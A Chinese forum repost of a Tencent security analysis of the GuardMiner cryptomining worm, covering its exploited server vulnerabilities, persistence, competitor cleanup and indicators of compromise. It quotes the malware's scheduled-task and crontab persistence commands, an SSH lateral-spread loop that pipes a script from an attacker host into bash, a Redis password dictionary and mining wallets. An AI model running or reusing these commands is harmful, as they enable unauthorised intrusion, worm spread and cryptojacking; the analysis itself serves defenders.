查看: 1460|回复: 0
收起左侧

[技术原创] GuardMiner挖矿木马近期活跃,具备蠕虫化主动攻击能力,已有较多企业中招

[复制链接]
腾讯电脑管家
发表于 2020-6-23 19:06:06 | 显示全部楼层 |阅读模式
一、背景
腾讯安全威胁情报中心检测到跨平台挖矿木马GuardMiner近期十分活跃,该木马会扫描攻击Redis、Drupal、Hadoop、Spring、thinkphp、WebLogic、SQLServer、Elasticsearch多个服务器组件漏洞,并在攻陷的Windows和Linux系统中分别执行恶意脚本init.ps1,init.sh,恶意脚本会进一步下载门罗币挖矿木马、清除竞品挖矿木马并进行本地持久化运行。在Linux系统上利用SSH连接和Redis弱口令爆破进行内网扩散攻击。因挖矿守护进程使用文件名为sysguard、sysguerd、phpguard,腾讯安全威胁情报中心将该挖矿木马命名为GuardMiner
因该病毒已具备蠕虫化主动攻击扩散的能力,已有部分企业中招。腾讯安全专家建议政企机构尽快修复服务器组件漏洞,相关服务避免使用弱口令。腾讯安全系列产品均可检测并协助清除GuardMiner挖矿木马。

腾讯安全系列产品应对GuardMiner挖矿木马的响应清单:
更多产品信息,请参考腾讯安全官方网站https://s.tencent.com/
二、样本分析
1init.ps1攻击Windows系统,从服务器下载挖矿进程phpupdate.exe,配置文件config.json,扫描攻击进程networkmanager.exe,持久化脚本newdat.ps1,挖矿守护进程phpguard.exe,清理脚本clean.bat
2init.sh攻击Linux系统,从服务器下载挖矿进程phpupdate,配置文件config.json,持久化脚本newdat.sh,扫描攻击进程networkmanager,挖矿守护进程phpuguard
3、门罗币挖矿进程phpupdate.exe占用CPU接近100%:
挖矿使用的三组矿池和钱包分别如下:
xmr.f2pool.com:13531
43zqYTWj1JG1H1idZFQWwJZLTos3hbJ5iR3tJpEtwEi43UBbzPeaQxCRysdjYTtdc8aHao7csiWa5BTP9PfNYzyfSbbrwoR.v520
xmr-eu2.nanopool.org:14444
43zqYTWj1JG1H1idZFQWwJZLTos3hbJ5iR3tJpEtwEi43UBbzPeaQxCRysdjYTtdc8aHao7csiWa5BTP9PfNYzyfSbbrwoR.v520
randomxmonero.hk.nicehash.com:3380
3HVQkSGfvyyQ8ACpShBhegoKGLuTCMCiAr.v520
4、清除竞品挖矿木马文件:
5、phpguard.exe、phpguard负责守护挖矿进程,进程退出后立即重启:
6、在Windows系统上通过安装计划任务持久化,每隔30分钟执行一次newdat.ps1
SchTasks.exe /Create /SC MINUTE /TN "Update service for Windows Service" /TR "PowerShell.exe -ExecutionPolicy bypass -windowstyle hidden -File $HOME\newdat.ps1" /MO 30 /F
在Linux系统上通过定时任务持久化,每隔30分钟执行一次newdat.sh
crontab -l ; echo "*/30 * * * * sh /etc/newdat.sh >/dev/null 2>&1"
7、在Linux系统上还会通过sshown_hosts获取登录过的机器IP,建立SSH连接并执行远程shell脚本is.sh,进行内网扩散攻击:
if [ -f /root/.sshown_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
  for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.sshown_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'curl -o-  http[:]//global.bitmex.com.de/cf67355a3333e6/is.sh | bash >/dev/null 2>&1 &' & done
fi
is.sh接着安装扫描工具Pnscan和Masscan针对全网段IP范围进行6379端口(Redis服务)扫描,并通过Redis弱口令爆破(密码字典:redis、root、oracle、password、p@aaw0rd、abc123、abc123!、123456、admin)以及未授权访问漏洞感染执行init.sh:


8Windows系统上执行networkmanager.exe,Linux系统上执行networkmanager,开启漏洞扫描和利用攻击,针对以下服务器组件,攻击成功后在Windows系统执行Powershell脚本,在Linux系统执行shell脚本进行进行感染:
1) Redis未授权访问漏洞;
2) Drupal框架CVE-2018-7600漏洞;
3) Hadoop未授权漏洞;
4) Spring框架CVE-2018-1273漏洞;
5) thinkphp框架TP5高危漏洞;
6) WebLogic框架CVE-2017-10271漏洞;
7) SQLServer框架xcmd_shell、SP_OACreate注入提权漏洞;
8) Elasticsearch框架CVE-2015-1427、CVE-2014-3120远程代码执行漏洞。



IOCs
IP
185.247.117.64
209.182.218.161
178.157.91.26
146.71.79.230
43.245.222.57
URL
http[:]//185.247.117.64/cf67355/phpupdate
http[:]//global.bitmex.com.de/cf67355a3333e6/phpupdate
http[:]//185.247.117.64/cf67355/newdat.sh
http[:]//global.bitmex.com.de/cf67355a3333e6/newdat.sh
http[:]//185.247.117.64/cf67355/config.json
http[:]//global.bitmex.com.de/cf67355a3333e6/config.json
http[:]//185.247.117.64/cf67355/networkmanager
http[:]//global.bitmex.com.de/cf67355a3333e6/networkmanager
http[:]//185.247.117.64/cf67355/phpguard
http[:]//global.bitmex.com.de/cf67355a3333e6/phpguard
http[:]//185.247.117.64/cf67355/phpupdate.exe
http[:]//global.bitmex.com.de/cf67355a3333e6/phpupdate.exe
http[:]//185.247.117.64/cf67355/config.json
http[:]//global.bitmex.com.de/cf67355a3333e6/config.json
http[:]//185.247.117.64/cf67355/networkmanager.exe
http[:]//global.bitmex.com.de/cf67355a3333e6/networkmanager.exe
http[:]//185.247.117.64/cf67355/newdat.ps1
http[:]//global.bitmex.com.de/cf67355a3333e6/newdat.ps1
http[:]//185.247.117.64/cf67355/phpguard.exe
http[:]//global.bitmex.com.de/cf67355a3333e6/phpguard.exe
http[:]//185.247.117.64/cf67355/clean.bat
http[:]//global.bitmex.com.de/cf67355a3333e6/clean.bat
md5
init.ps1
8c179d90a30b9ff905c810f7e3eb28a1
init.sh
6bb17fedbc6737189d4ea61a54db65ea
rs.sh
190234640306730c02a738b8a46b62ea
is.sh
9b0d0e89b1ae2728ebf9ca0418230a04
phpupdate.exe
97f3dab8aa665aac5200485fc23b9248
networkmanager.exe
85b670f8b603b4e98b4f98b768fe4f51
phpguard.exe
6004de04a0430b6cf4fd49c0ea306d8d
networkmanager
8d1fff480d2c8dd9438b9d09d31838b0
phpupdate
149c79bf71a54ec41f6793819682f790
phpguard
2f975f548551024030c615d451cd10a0


参考链接
https://www.freebuf.com/column/205114.html
https://www.freebuf.com/articles/system/233138.html
https://s.tencent.com/research/report/904.html

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-22 11:48 , Processed in 0.227582 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表